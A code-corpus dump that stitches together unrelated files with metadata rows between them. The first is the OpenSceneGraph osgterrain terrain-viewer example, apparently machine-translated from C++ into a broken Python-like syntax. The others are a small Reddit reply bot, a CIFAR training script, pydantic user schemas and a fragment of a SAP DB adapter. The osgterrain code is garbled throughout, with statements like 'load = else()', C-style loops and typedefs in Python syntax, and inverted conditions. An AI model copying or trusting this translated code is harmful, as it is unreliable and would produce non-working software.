# OpenSceneGraph example, osgterrain.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <OpenThreads/Block>
#include <osg/Group>
#include <osg/Geode>
#include <osg/ShapeDrawable>
#include <osg/Texture2D>
#include <osg/PositionAttitudeTransform>
#include <osg/MatrixTransform>
#include <osg/CoordinateSystemNode>
#include <osg/ClusterCullingCallback>
#include <osg/ArgumentParser>
#include <osgDB/FileUtils>
#include <osgDB/fstream>
#include <osgDB/ReadFile>
#include <osgUtil/IncrementalCompileOperation>
#include <osgText/FadeText>
#include <osgViewer/Viewer>
#include <osgViewer/ViewerEventHandlers>
#include <osgGA/TrackballManipulator>
#include <osgGA/FlightManipulator>
#include <osgGA/DriveManipulator>
#include <osgGA/KeySwitchMatrixManipulator>
#include <osgGA/StateSetManipulator>
#include <osgGA/AnimationPathManipulator>
#include <osgGA/TerrainManipulator>
#include <osgTerrain/TerrainTile>
#include <osgTerrain/GeometryTechnique>
#include <osgTerrain/Layer>
#include <iostream>
typedef std.vector< osg.GraphicsThread > GraphicsThreads
class ReleaseBlockOnCompileCompleted (osgUtil.IncrementalCompileOperation.CompileCompletedCallback) :
ReleaseBlockOnCompileCompleted(osg.RefBlockCount* block):
_block(block)
def compileCompleted(compileSet):
if _block.valid() : _block.completed()
# tell IncrementalCompileOperation that it's now safe to remove the compileSet
osg.notify(osg.NOTICE), "compileCompleted(", compileSet, ")"
return True
_block = osg.RefBlockCount()
class LoadAndCompileOperation (osg.Operation) :
LoadAndCompileOperation( str filename, osgUtil.IncrementalCompileOperation* ico , osg.RefBlockCount* block):
Operation("Load and compile Operation", False),
_filename(filename),
_incrementalCompileOperation(ico),
_block(block)
virtual void operator () (osg.Object* object)
# osg.notify(osg.NOTICE), "LoadAndCompileOperation ", _filename
_loadedModel = osgDB.readNodeFile(_filename)
if _loadedModel.valid() and _incrementalCompileOperation.valid() :
compileSet = osgUtil.IncrementalCompileOperation.CompileSet(_loadedModel)
compileSet._compileCompletedCallback = ReleaseBlockOnCompileCompleted(_block)
_incrementalCompileOperation.add(compileSet)
else:
if _block.valid() : _block.completed()
# osg.notify(osg.NOTICE), "done LoadAndCompileOperation ", _filename
_filename = str()
_loadedModel = osg.Node()
_incrementalCompileOperation = osgUtil.IncrementalCompileOperation()
_block = osg.RefBlockCount()
class MasterOperation (osg.Operation) :
typedef std.set<str> Files
typedef std.map<str, osg.Node > FilenameNodeMap
typedef std.vector< osg.Node > Nodes
MasterOperation( str filename, osgUtil.IncrementalCompileOperation* ico):
Operation("Master reading operation",True),
_filename(filename),
_incrementalCompileOperation(ico)
#* Set the OperationQueue that the MasterOperation can use to place tasks like file loading on for other processes to handle.
def setOperationQueue(oq):
_operationQueue = oq
def getOperationQueue():
return _operationQueue
def readMasterFile(files):
fin = osgDB.ifstream(_filename.c_str())
if fin :
fr = osgDB.Input()
fr.attach(fin)
readFilename = False
while not fr.eof() :
itrAdvanced = False
if fr.matchSequence("file %s") or fr.matchSequence("file %w") :
files.insert(fr[1].getStr())
fr += 2
itrAdvanced = True
readFilename = True
if not itrAdvanced :
++fr
return readFilename
return False
def open(group):
files = Files()
readMasterFile(files)
for(Files.iterator itr = files.begin()
not = files.end()
++itr)
model = osgDB.readNodeFile(*itr)
if model :
osg.notify(osg.NOTICE), "open: Loaded file ", *itr
group.addChild(model)
_existingFilenameNodeMap[*itr] = model
return True
virtual void operator () (osg.Object* callingObject)
# decided which method to call according to whole has called me.
viewer = dynamic_cast<osgViewer.Viewer*>(callingObject)
if viewer : update(viewer.getSceneData())
load = else()
def load():
#osg.notify(osg.NOTICE), "void load(Object)"
filesA = Files()
filesB = Files()
readMasterFile(filesB)
# osg.notify(osg.NOTICE), "First read ", filesA.size()
# itererate until the master file is stable
do
OpenThreads.Thread.microSleep(100000)
filesB.swap(filesA)
filesB.clear()
readMasterFile(filesB)
# osg.notify(osg.NOTICE), "second read ", filesB.size()
while filesA not =filesB :
files = Files()
files.swap(filesB)
# osg.notify(osg.NOTICE), "Now equal ", files.size()
newFiles = Files()
removedFiles = Files()
# find out which files are , and which ones have been removed.
lock = OpenThreads.ScopedLock<OpenThreads.Mutex>(_mutex)
for(Files.iterator fitr = files.begin()
not = files.end()
++fitr)
if _existingFilenameNodeMap.count(*fitr)==0 : newFiles.insert(*fitr)
for(FilenameNodeMap.iterator litr = _existingFilenameNodeMap.begin()
not = _existingFilenameNodeMap.end()
++litr)
if files.count(litr.first)==0 :
removedFiles.insert(litr.first)
#if 0
if not newFiles.empty() or not removedFiles.empty() :
osg.notify(osg.NOTICE), "void operator () files.size()=", files.size()
#endif
# first load the files.
nodesToAdd = FilenameNodeMap()
if not newFiles.empty() :
typedef std.vector< osg.GraphicsThread > GraphicsThreads
threads = GraphicsThreads()
for(unsigned int i=0 i<= osg.GraphicsContext.getMaxContextID() ++i)
gc = osg.GraphicsContext.getCompileContext(i)
gt = gc.getGraphicsThread() if (gc) else 0
if gt : threads.push_back(gt)
if _operationQueue.valid() :
# osg.notify(osg.NOTICE), "Using OperationQueue"
_endOfLoadBlock = osg.RefBlockCount(newFiles.size())
_endOfLoadBlock.reset()
typedef std.list< LoadAndCompileOperation > LoadAndCompileList
loadAndCompileList = LoadAndCompileList()
for(Files.iterator nitr = newFiles.begin()
not = newFiles.end()
++nitr)
# osg.notify(osg.NOTICE), "Adding LoadAndCompileOperation ", *nitr
loadAndCompile = LoadAndCompileOperation( *nitr, _incrementalCompileOperation, _endOfLoadBlock )
loadAndCompileList.push_back(loadAndCompile)
_operationQueue.add( loadAndCompile )
#if 1
operation = osg.Operation()
while operation=_operationQueue.getNextOperation() :.valid() :
# osg.notify(osg.NOTICE), "Local running of operation"
(*operation)(0)
#endif
# osg.notify(osg.NOTICE), "Waiting for completion of LoadAndCompile operations"
_endOfLoadBlock.block()
# osg.notify(osg.NOTICE), "done ... Waiting for completion of LoadAndCompile operations"
for(LoadAndCompileList.iterator litr = loadAndCompileList.begin()
not = loadAndCompileList.end()
++litr)
if *litr :._loadedModel.valid() :
nodesToAdd[(*litr)._filename] = (*litr)._loadedModel
else:
_endOfLoadBlock = osg.RefBlockCount(newFiles.size())
_endOfLoadBlock.reset()
for(Files.iterator nitr = newFiles.begin()
not = newFiles.end()
++nitr)
loadedModel = osgDB.readNodeFile(*nitr)
if loadedModel :
nodesToAdd[*nitr] = loadedModel
if _incrementalCompileOperation.valid() :
compileSet = osgUtil.IncrementalCompileOperation.CompileSet(loadedModel)
compileSet._compileCompletedCallback = ReleaseBlockOnCompileCompleted(_endOfLoadBlock)
_incrementalCompileOperation.add(compileSet)
else:
_endOfLoadBlock.completed()
else:
_endOfLoadBlock.completed()
_endOfLoadBlock.block()
requiresBlock = False
# pass the locally peppared data to MasterOperations shared data
# so that updated thread can merge these changes with the main scene
# graph. This merge is carried out via the update(..) method.
if not removedFiles.empty() or not nodesToAdd.empty() :
lock = OpenThreads.ScopedLock<OpenThreads.Mutex>(_mutex)
_nodesToRemove.swap(removedFiles)
_nodesToAdd.swap(nodesToAdd)
requiresBlock = True
# now block so we don't try to load anything till the data has been merged
# otherwise _existingFilenameNodeMap will get out of sync.
if requiresBlock :
_updatesMergedBlock.block()
else:
OpenThreads.Thread.YieldCurrentThread()
# merge the changes with the main scene graph.
def update(scene):
# osg.notify(osg.NOTICE), "void update(Node*)"
group = dynamic_cast<osg.Group*>(scene)
if not group :
osg.notify(osg.NOTICE), "Error, MasterOperation.update(Node*) can only work with a Group as Viewer.getSceneData()."
return
lock = OpenThreads.ScopedLock<OpenThreads.Mutex>(_mutex)
if not _nodesToRemove.empty() or not _nodesToAdd.empty() :
osg.notify(osg.NOTICE), "update().................. "
if not _nodesToRemove.empty() :
for(Files.iterator itr = _nodesToRemove.begin()
not = _nodesToRemove.end()
++itr)
fnmItr = _existingFilenameNodeMap.find(*itr)
if fnmItr not = _existingFilenameNodeMap.end() :
osg.notify(osg.NOTICE), " update():removing ", *itr
group.removeChild(fnmItr.second)
_existingFilenameNodeMap.erase(fnmItr)
_nodesToRemove.clear()
if not _nodesToAdd.empty() :
for(FilenameNodeMap.iterator itr = _nodesToAdd.begin()
not = _nodesToAdd.end()
++itr)
osg.notify(osg.NOTICE), " update():inserting ", itr.first
group.addChild(itr.second)
_existingFilenameNodeMap[itr.first] = itr.second
_nodesToAdd.clear()
_updatesMergedBlock.release()
# add release implementation so that any thread cancellation can
# work even when blocks and barriers are used.
def release():
if _operationQueue.valid() : _operationQueue.removeAllOperations()
_updatesMergedBlock.release()
if _endOfCompilebarrier.valid() : _endOfCompilebarrier.release()
if _endOfLoadBlock.valid() : _endOfLoadBlock.release()
_filename = str()
_mutex = OpenThreads.Mutex()
_existingFilenameNodeMap = FilenameNodeMap()
_nodesToRemove = Files()
_nodesToAdd = FilenameNodeMap()
_updatesMergedBlock = OpenThreads.Block()
_incrementalCompileOperation = osgUtil.IncrementalCompileOperation()
_endOfCompilebarrier = osg.BarrierOperation()
_endOfLoadBlock = osg.RefBlockCount()
_operationQueue = osg.OperationQueue()
class FilterHandler (osgGA.GUIEventHandler) :
FilterHandler(osgTerrain.GeometryTechnique* gt):
_gt(gt)
def handle(ea, aa):
if not _gt : return False
switch(ea.getEventType())
case(osgGA.GUIEventAdapter.KEYDOWN):
if ea.getKey() == ord("g") :
osg.notify(osg.NOTICE), "Gaussian"
_gt.setFilterMatrixAs(osgTerrain.GeometryTechnique.GAUSSIAN)
return True
elif ea.getKey() == ord("s") :
osg.notify(osg.NOTICE), "Smooth"
_gt.setFilterMatrixAs(osgTerrain.GeometryTechnique.SMOOTH)
return True
elif ea.getKey() == ord("S") :
osg.notify(osg.NOTICE), "Sharpen"
_gt.setFilterMatrixAs(osgTerrain.GeometryTechnique.SHARPEN)
return True
elif ea.getKey() == ord("+") :
_gt.setFilterWidth(_gt.getFilterWidth()*1.1)
osg.notify(osg.NOTICE), "Filter width = ", _gt.getFilterWidth()
return True
elif ea.getKey() == ord("-") :
_gt.setFilterWidth(_gt.getFilterWidth()/1.1)
osg.notify(osg.NOTICE), "Filter width = ", _gt.getFilterWidth()
return True
elif ea.getKey() == ord(">") :
_gt.setFilterBias(_gt.getFilterBias()+0.1)
osg.notify(osg.NOTICE), "Filter bias = ", _gt.getFilterBias()
return True
elif ea.getKey() == ord("<") :
_gt.setFilterBias(_gt.getFilterBias()-0.1)
osg.notify(osg.NOTICE), "Filter bias = ", _gt.getFilterBias()
return True
break
default:
break
return False
_gt = osg.observer_ptr<osgTerrain.GeometryTechnique>()
class LayerHandler (osgGA.GUIEventHandler) :
LayerHandler(osgTerrain.Layer* layer):
_layer(layer)
def handle(ea, aa):
if not _layer : return False
scale = 1.2
switch(ea.getEventType())
case(osgGA.GUIEventAdapter.KEYDOWN):
if ea.getKey() == ord("q") :
_layer.transform(0.0, scale)
return True
elif ea.getKey() == ord("a") :
_layer.transform(0.0, 1.0/scale)
return True
break
default:
break
return False
_layer = osg.observer_ptr<osgTerrain.Layer>()
def main(argv):
arguments = osg.ArgumentParser(argv)
# construct the viewer.
viewer = osgViewer.Viewer(arguments)
# set up the camera manipulators.
keyswitchManipulator = osgGA.KeySwitchMatrixManipulator()
keyswitchManipulator.addMatrixManipulator( ord("1"), "Trackball", osgGA.TrackballManipulator() )
keyswitchManipulator.addMatrixManipulator( ord("2"), "Flight", osgGA.FlightManipulator() )
keyswitchManipulator.addMatrixManipulator( ord("3"), "Drive", osgGA.DriveManipulator() )
keyswitchManipulator.addMatrixManipulator( ord("4"), "Terrain", osgGA.TerrainManipulator() )
pathfile = str()
keyForAnimationPath = ord("5")
while arguments.read("-p",pathfile) :
apm = osgGA.AnimationPathManipulator(pathfile)
if apm or not apm.valid() :
num = keyswitchManipulator.getNumMatrixManipulators()
keyswitchManipulator.addMatrixManipulator( keyForAnimationPath, "Path", apm )
keyswitchManipulator.selectMatrixManipulator(num)
++keyForAnimationPath
viewer.setCameraManipulator( keyswitchManipulator )
# add the state manipulator
viewer.addEventHandler( osgGA.StateSetManipulator(viewer.getCamera().getOrCreateStateSet()) )
# add the stats handler
viewer.addEventHandler(osgViewer.StatsHandler)()
# add the record camera path handler
viewer.addEventHandler(osgViewer.RecordCameraPathHandler)()
# attach an IncrementaCompileOperation to allow the master loading
# to be handled with an incremental compile to avoid frame drops when large objects are added.
viewer.setIncrementalCompileOperation(osgUtil.IncrementalCompileOperation())
x = 0.0
y = 0.0
w = 1.0
h = 1.0
numLoadThreads = 1
while arguments.read("--load-threads",numLoadThreads) :
masterOperation = MasterOperation()
masterFilename = str()
while arguments.read("-m",masterFilename) :
masterOperation = MasterOperation(masterFilename, viewer.getIncrementalCompileOperation())
terrainTile = osgTerrain.TerrainTile()
locator = osgTerrain.Locator()
validDataOperator = osgTerrain.NoDataValue(0.0)
lastAppliedLayer = osgTerrain.Layer()
locator.setCoordinateSystemType(osgTerrain.Locator.GEOCENTRIC)
locator.setTransformAsExtents(-osg.PI, -osg.PI*0.5, osg.PI, osg.PI*0.5)
layerNum = 0
filterName = str()
filter = osg.Texture.LINEAR
float minValue, maxValue
scale = 1.0
offset = 0.0
pos = 1
while pos<arguments.argc() :
filename = str()
if arguments.read(pos, "--layer",layerNum) :
osg.notify(osg.NOTICE), "Set layer number to ", layerNum
elif arguments.read(pos, "-b") :
terrainTile.setTreatBoundariesToValidDataAsDefaultValue(True)
elif arguments.read(pos, "-e",x,y,w,h) :
# define the extents.
locator.setCoordinateSystemType(osgTerrain.Locator.GEOCENTRIC)
locator.setTransformAsExtents(x,y,x+w,y+h)
elif arguments.read(pos, "--transform",offset, scale) or arguments.read(pos, "-t",offset, scale) :
# define the extents.
elif arguments.read(pos, "--cartesian",x,y,w,h) :
# define the extents.
locator.setCoordinateSystemType(osgTerrain.Locator.PROJECTED)
locator.setTransformAsExtents(x,y,x+w,y+h)
elif arguments.read(pos, "--hf",filename) :
osg.notify(osg.NOTICE), "--hf ", filename
hf = osgDB.readHeightFieldFile(filename)
if hf.valid() :
hfl = osgTerrain.HeightFieldLayer()
hfl.setHeightField(hf)
hfl.setLocator(locator)
hfl.setValidDataOperator(validDataOperator)
hfl.setMagFilter(filter)
if offset not =0.0 or scale not =1.0 :
hfl.transform(offset,scale)
terrainTile.setElevationLayer(hfl)
lastAppliedLayer = hfl
osg.notify(osg.NOTICE), "created osgTerrain.HeightFieldLayer"
else:
osg.notify(osg.NOTICE), "failed to create osgTerrain.HeightFieldLayer"
scale = 1.0
offset = 0.0
elif arguments.read(pos, "-d",filename) or arguments.read(pos, "--elevation-image",filename) :
osg.notify(osg.NOTICE), "--elevation-image ", filename
image = osgDB.readImageFile(filename)
if image.valid() :
imageLayer = osgTerrain.ImageLayer()
imageLayer.setImage(image)
imageLayer.setLocator(locator)
imageLayer.setValidDataOperator(validDataOperator)
imageLayer.setMagFilter(filter)
if offset not =0.0 or scale not =1.0 :
imageLayer.transform(offset,scale)
terrainTile.setElevationLayer(imageLayer)
lastAppliedLayer = imageLayer
osg.notify(osg.NOTICE), "created Elevation osgTerrain.ImageLayer"
else:
osg.notify(osg.NOTICE), "failed to create osgTerrain.ImageLayer"
scale = 1.0
offset = 0.0
elif arguments.read(pos, "-c",filename) or arguments.read(pos, "--image",filename) :
osg.notify(osg.NOTICE), "--image ", filename, " x=", x, " y=", y, " w=", w, " h=", h
image = osgDB.readImageFile(filename)
if image.valid() :
imageLayer = osgTerrain.ImageLayer()
imageLayer.setImage(image)
imageLayer.setLocator(locator)
imageLayer.setValidDataOperator(validDataOperator)
imageLayer.setMagFilter(filter)
if offset not =0.0 or scale not =1.0 :
imageLayer.transform(offset,scale)
terrainTile.setColorLayer(layerNum, imageLayer)
lastAppliedLayer = imageLayer
osg.notify(osg.NOTICE), "created Color osgTerrain.ImageLayer"
else:
osg.notify(osg.NOTICE), "failed to create osgTerrain.ImageLayer"
scale = 1.0
offset = 0.0
elif arguments.read(pos, "--filter",filterName) :
if filterName=="NEAREST" :
osg.notify(osg.NOTICE), "--filter ", filterName
filter = osg.Texture.NEAREST
elif filterName=="LINEAR" :
filter = osg.Texture.LINEAR
osg.notify(osg.NOTICE), "--filter ", filterName
else:
osg.notify(osg.NOTICE), "--filter ", filterName, " unrecognized filter name, please use LINEAER or NEAREST."
if terrainTile.getColorLayer(layerNum) :
terrainTile.getColorLayer(layerNum).setMagFilter(filter)
elif arguments.read(pos, "--tf",minValue, maxValue) :
tf = osg.TransferFunction1D()
numCells = 6
delta = (maxValue-minValue)/float(numCells-1)
v = minValue
tf.allocate(6)
tf.setColor(v, osg.Vec4(1.0,1.0,1.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(1.0,0.0,1.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(1.0,0.0,0.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(1.0,1.0,0.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(0.0,1.0,1.0,1.0)) v += delta
tf.setColor(v, osg.Vec4(0.0,1.0,0.0,1.0))
osg.notify(osg.NOTICE), "--tf ", minValue, " ", maxValue
terrainTile.setColorLayer(layerNum, osgTerrain.ContourLayer(tf))
else:
++pos
scene = osg.Group()
if terrainTile.valid() and (terrainTile.getElevationLayer() or terrainTile.getColorLayer(0)) :
osg.notify(osg.NOTICE), "Terrain created"
scene.addChild(terrainTile)
geometryTechnique = osgTerrain.GeometryTechnique()
terrainTile.setTerrainTechnique(geometryTechnique)
viewer.addEventHandler(FilterHandler(geometryTechnique))
viewer.addEventHandler(LayerHandler(lastAppliedLayer))
if masterOperation.valid() :
osg.notify(osg.NOTICE), "Master operation created"
masterOperation.open(scene)
if scene.getNumChildren()==0 :
osg.notify(osg.NOTICE), "No model created, please specify terrain or master file on command line."
return 0
viewer.setSceneData(scene)
# start operation thread if a master file has been used.
masterOperationThread = osg.OperationThread()
typedef std.list< osg.OperationThread > OperationThreadList
generalThreadList = OperationThreadList()
if masterOperation.valid() :
masterOperationThread = osg.OperationThread()
masterOperationThread.startThread()
masterOperationThread.add(masterOperation)
# if numLoadThreads>0 :
operationQueue = osg.OperationQueue()
masterOperation.setOperationQueue(operationQueue)
for(unsigned int i=0 i<numLoadThreads ++i)
thread = osg.OperationThread()
thread.setOperationQueue(operationQueue)
thread.startThread()
generalThreadList.push_back(thread)
viewer.addUpdateOperation(masterOperation)
viewer.setThreadingModel(osgViewer.Viewer.SingleThreaded)
# enable the use of compile contexts and associated threads.
# osg.DisplaySettings.instance().setCompileContextsHint(True)
# realize the graphics windows.
viewer.realize()
# run the viewers main loop
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
| 34.661458 | 130 | 0.598911 | 2,423 | 26,620 | 6.526207 | 0.215848 | 0.024474 | 0.032631 | 0.048947 | 0.273509 | 0.222665 | 0.174856 | 0.156707 | 0.148991 | 0.144818 | 0 | 0.007858 | 0.306837 | 26,620 | 767 | 131 | 34.706649 | 0.849122 | 0 | 0 | 0.294521 | 0 | 0 | 0.045928 | 0.009662 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.020548 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
482697dcf4d097846528ae15ee8dbca33b6e86d7 | 525 | py | Python | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | splunge.py | neilebliss/reddit_bot | 74be4b57ddbdf9fe0d9876207388ee2778b4a50d | [
"Unlicense"
] | null | null | null | import praw
import re
import os
reddit = praw.Reddit('Splunge Bot v1', client_id=os.environ['REDDIT_CLIENT_ID'], client_secret=os.environ['REDDIT_CLIENT_SECRET'], password=os.environ['REDDIT_PASSWORD'], username=os.environ['REDDIT_USERNAME'])
subreddit = reddit.subreddit('tubasaur')
for submission in subreddit.new(limit=5):
for top_level_comment in submission.comments:
if re.search('splunge', top_level_comment.body, re.IGNORECASE):
top_level_comment.reply("Well, yeah, splunge for me too!")
print("Splunged.")
| 40.384615 | 210 | 0.775238 | 76 | 525 | 5.171053 | 0.486842 | 0.091603 | 0.152672 | 0.10687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004193 | 0.091429 | 525 | 12 | 211 | 43.75 | 0.819707 | 0 | 0 | 0 | 0 | 0 | 0.257634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.3 | 0 | 0.3 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
482da58116dfb913fbea2c87dc9df1955becba11 | 3,528 | py | Python | code/a_train_generalist.py | seba-1511/specialists | 9888e639707142db80aafe6ae7bf25f572d34505 | [
"Apache-2.0"
] | 1 | 2016-05-31T07:54:31.000Z | 2016-05-31T07:54:31.000Z | code/a_train_generalist.py | seba-1511/specialists | 9888e639707142db80aafe6ae7bf25f572d34505 | [
"Apache-2.0"
] | null | null | null | code/a_train_generalist.py | seba-1511/specialists | 9888e639707142db80aafe6ae7bf25f572d34505 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is an experiment that will train a specified generalist network.
"""
import random
import numpy as np
from neon.backends import gen_backend
from neon.data import DataIterator, load_cifar10
from neon.transforms.cost import Misclassification
from neon.callbacks.callbacks import Callbacks
from neon.util.argparser import NeonArgparser
from neon.util.persist import save_obj
from keras.datasets import cifar100
from cifar_net import get_custom_vgg
# parse the command line arguments
parser = NeonArgparser(__doc__)
args = parser.parse_args()
DATASET_NAME = 'cifar100'
EXPERIMENT_DIR = 'experiments/' + DATASET_NAME + '/'
VALIDATION = True
def split_train_set(X_train, y_train):
return (X_train[:-5000], y_train[:-5000]), (X_train[-5000:], y_train[-5000:])
def load_data(name):
if name == 'cifar10':
(X_train, y_train), (X_test, y_test), nout = load_cifar10(path=args.data_dir)
nout = 16
elif name == 'cifar100':
(X_train, y_train), (X_test, y_test) = cifar100.load_data(label_mode='fine')
X_train = X_train.reshape(50000, 3072)
X_test = X_test.reshape(10000, 3072)
nout = 128
elif name == 'svhn':
from scipy.io import loadmat
train = loadmat('../data/svhm_train.mat')
test = loadmat('../data/svhn_test.mat')
(X_train, y_train), (X_test, y_test) = (train['X'], train['y']), (test['X'], test['y'])
s = X_train.shape
X_train = X_train.reshape(-1, s[-1]).transpose()
s = X_test.shape
X_test = X_test.reshape(-1, s[-1]).transpose()
temp = np.empty(X_train.shape, dtype=np.uint)
np.copyto(temp, X_train)
X_train = temp
temp = np.empty(X_test.shape, dtype=np.uint)
np.copyto(temp, X_test)
X_test = temp
nout = 16
return (X_train, y_train), (X_test, y_test), nout
if __name__ == '__main__':
# hyperparameters
batch_size = 64
num_epochs = args.epochs
num_epochs = 74 if num_epochs == 10 else num_epochs
rng_seed = 1234
np.random.seed(rng_seed)
random.seed(rng_seed)
# setup backend
be = gen_backend(
backend=args.backend,
batch_size=batch_size,
rng_seed=rng_seed,
device_id=args.device_id,
default_dtype=args.datatype,
)
(X_train, y_train), (X_test, y_test), nout = load_data(DATASET_NAME)
if VALIDATION:
(X_train, y_train), (X_valid, y_valid) = split_train_set(X_train, y_train)
model, opt, cost = get_custom_vgg(nout=nout)
train_set = DataIterator(X_train, y_train, nclass=nout, lshape=(3, 32, 32))
test_set = DataIterator(X_test, y_test, nclass=nout, lshape=(3, 32, 32))
callbacks = Callbacks(model, train_set, args, eval_set=test_set)
if VALIDATION:
valid_set = DataIterator(X_valid, y_valid, nclass=nout, lshape=(3, 32, 32))
callbacks = Callbacks(model, train_set, args, eval_set=valid_set)
model.fit(train_set, optimizer=opt, num_epochs=num_epochs, cost=cost, callbacks=callbacks)
print 'Validation: ', VALIDATION
print 'Train misclassification error: ', model.eval(train_set, metric=Misclassification())
if VALIDATION:
print 'Valid misclassification error: ', model.eval(valid_set, metric=Misclassification())
print 'Test misclassification error: ', model.eval(test_set, metric=Misclassification())
if args.save_path is not None:
save_obj(model.serialize(), EXPERIMENT_DIR + args.save_path)
| 33.283019 | 98 | 0.67602 | 505 | 3,528 | 4.473267 | 0.269307 | 0.053121 | 0.030987 | 0.047809 | 0.236388 | 0.188136 | 0.161133 | 0.139 | 0.093847 | 0.082337 | 0 | 0.031628 | 0.202381 | 3,528 | 105 | 99 | 33.6 | 0.771144 | 0.029762 | 0 | 0.066667 | 0 | 0 | 0.06087 | 0.012894 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.146667 | null | null | 0.053333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4834a12f8b0a1adc974a9695986c5da1d9c04010 | 603 | py | Python | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 9 | 2020-02-03T11:17:06.000Z | 2021-06-15T13:20:34.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 40 | 2020-02-03T11:23:59.000Z | 2020-05-19T08:05:41.000Z | repost/api/schemas/user.py | pckv/fastapi-backend | 0f561528086ac3fdcabbf9efeac888421eeb66de | [
"MIT"
] | 1 | 2020-03-11T02:47:40.000Z | 2020-03-11T02:47:40.000Z | """API schemas for users."""
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class User(BaseModel):
"""Schema for a user account"""
username: str
bio: Optional[str]
avatar_url: Optional[str]
created: datetime
edited: Optional[datetime]
class Config:
orm_mode = True
class CreateUser(BaseModel):
"""Schema for creating a new user account"""
username: str
password: str
class EditUser(BaseModel):
"""Schema for editing a user account"""
bio: Optional[str] = None
avatar_url: Optional[str] = None
| 20.1 | 48 | 0.681592 | 75 | 603 | 5.44 | 0.453333 | 0.107843 | 0.132353 | 0.107843 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.223881 | 603 | 29 | 49 | 20.793103 | 0.871795 | 0.200663 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.058824 | 0.176471 | 0 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
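A small, made-up instantiation of the schemas above (pydantic v1 style, matching the orm_mode Config used in the file); the import path follows the repo path shown in the row but is otherwise assumed:

# Illustrative only; field values are invented.
from datetime import datetime
from repost.api.schemas.user import CreateUser, User

new_account = CreateUser(username="alice", password="hunter2")
profile = User(username="alice", bio=None, avatar_url=None,
               created=datetime(2020, 1, 1), edited=None)
print(new_account.dict(), profile.dict())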
483592e4049e6951c186723536311a58d0a2c2a3 | 1,459 | py | Python | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 408 | 2015-01-01T10:31:47.000Z | 2022-03-26T17:41:21.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 521 | 2015-01-08T14:45:54.000Z | 2022-03-24T11:15:22.000Z | gluon/packages/dal/pydal/adapters/sap.py | GeorgesBrantley/ResistanceGame | 65ec925ec8399af355e176c4814a749fde5f907d | [
"BSD-3-Clause"
] | 158 | 2015-01-25T20:02:00.000Z | 2022-03-01T06:29:12.000Z | import re
from .._compat import integer_types, long
from .base import SQLAdapter
from . import adapters
@adapters.register_for("sapdb")
class SAPDB(SQLAdapter):
dbengine = "sapdb"
drivers = ("sapdb",)
REGEX_URI = (
"^(?P<user>[^:@]+)(:(?P<password>[^@]*))?"
r"@(?P<host>[^:/]+|\[[^\]]+\])/(?P<db>[^?]+)$"
)
def _initialize_(self):
super(SAPDB, self)._initialize_()
